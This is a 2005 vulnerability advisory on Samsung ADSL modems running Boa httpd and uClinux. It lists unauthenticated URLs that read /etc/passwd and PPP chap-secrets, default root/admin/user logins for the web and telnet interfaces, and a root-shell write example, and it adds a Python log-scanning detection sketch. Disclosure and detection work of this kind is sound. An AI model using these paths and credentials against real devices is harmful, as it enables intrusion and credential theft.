------------------------------------------------------------
- EXPL-A-2005-002 exploitlabs.com Advisory 031 -
------------------------------------------------------------
- Samsung ADSL Modem -

AFFECTED PRODUCTS
=================
Samsung ADSL Modem
Samsung Electronics
http://www.samsung.com

DETAILS
=======
All items are via WAN by default

1. Arbitrary reading of files
2. Default root password
3. root file system access

Known issues exist in Boa httpd as per:
FreeBSD-SA-00:60 Security Advisory
http://www.securiteam.com/unixfocus/6G0081P0AI.html
and
http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html

note: This is a hardware-based product with a built-in httpd for remote access. This is a separate issue from the ones formally presented above, but it carries the same implications.

Identification:

HTTP/1.0 400 Bad Request
Date: Sat, 03 Jan 1970 17:57:18 GMT
Server: Boa/0.93.15
Connection: close
Content-Type: text/html

Modem vendor                  Samsung Electronics (co)
modem co chipset vendor       b500545354430002
cpe chipset vendor            Samsung Electronics (co)
cpe chipset software version  SMDK8947v1.2 Jul 11 2003 10:00:01
ADSL DMT version              a-110.030620-10130710

Samsung ADSL modems run uClinux OS
http://www.uclinux.com

note: Depending on the implementation, other products using a combination of Boa / uClinux may be affected as well.

Item 1
---------
http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/
http://[someSamsung.ip]/var/ppp/chap-secrets
http://[someSamsung.ip]/bin/sh

Any remote user may request any file present in the router/modem OS file system via WAN. Files can be fetched unauthenticated via a GET request in a browser.
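
A detection sketch for Item 1, added here as an example and not part of the original advisory: it scans HTTP request logs for reads of the OS directories listed above and reports whether the device answered with content. It assumes an upstream proxy or sensor writes Common Log Format; `find_fs_reads`, `OS_DIRS` and the sample lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Top-level directories from Item 1; none belongs under a web document root.
OS_DIRS = {"etc", "bin", "dev", "lib", "tmp", "var"}

# Common Log Format, assumed here as the output of an upstream proxy or sensor.
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)

def normalize(target):
    """Drop the query, percent-decode, and collapse //, ./ and ../ segments."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/"))

def find_fs_reads(lines):
    """Return (source, normalized_path, served) for requests into OS_DIRS."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m or m["method"] not in ("GET", "HEAD"):
            continue
        path = normalize(m["target"])
        if path.split("/")[1] in OS_DIRS:
            # served=True means the device answered 2xx, i.e. content left it.
            hits.append((m["src"], path, m["status"].startswith("2")))
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jan/2005:10:01:02 +0000] "GET /etc/passwd HTTP/1.0" 200 312',
    '203.0.113.7 - - [12/Jan/2005:10:01:05 +0000] "GET //var/ppp/./chap-secrets HTTP/1.0" 200 88',
    '198.51.100.4 - - [12/Jan/2005:10:02:11 +0000] "GET /cgi-bin/adsl.cgi HTTP/1.0" 401 0',
    '198.51.100.9 - - [12/Jan/2005:10:03:40 +0000] "GET /bin/ HTTP/1.0" 404 0',
    '198.51.100.9 - - [12/Jan/2005:10:03:41 +0000] "GET /etcetera.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for src, path, served in find_fs_reads(SAMPLE_LOG):
        print(f"{src} {path} {'SERVED' if served else 'attempted'}")
```

A hit with `served` set means file content left the device; for `/var/ppp/chap-secrets` that is a reason to rotate the PPP credentials.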

Item 2
======
Default user login / passwords exist in both httpd (http://[host]/cgi-bin/adsl.cgi) and telnet ports

root/root
admin/admin
user/user

Item 3
======
By telnetting to the device and logging in as root/root, remote users may access the filesystem. The modem provides 256 MB of RAM for OS and file system operations. In this implementation there is approx. 120 MB of free file system space, which allows for the possibility of remote attackers using the file system for malicious communication and file storage. This allows many scenarios, such as storing worm and/or viral code.

#echo "some bad data" >file

SOLUTION:
=========
none to date
Samsung has been contacted
No patch released

Credits
=======
This vulnerability was discovered and researched by Donnie Werner of exploitlabs

Donnie Werner
mail: morning_wood@zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org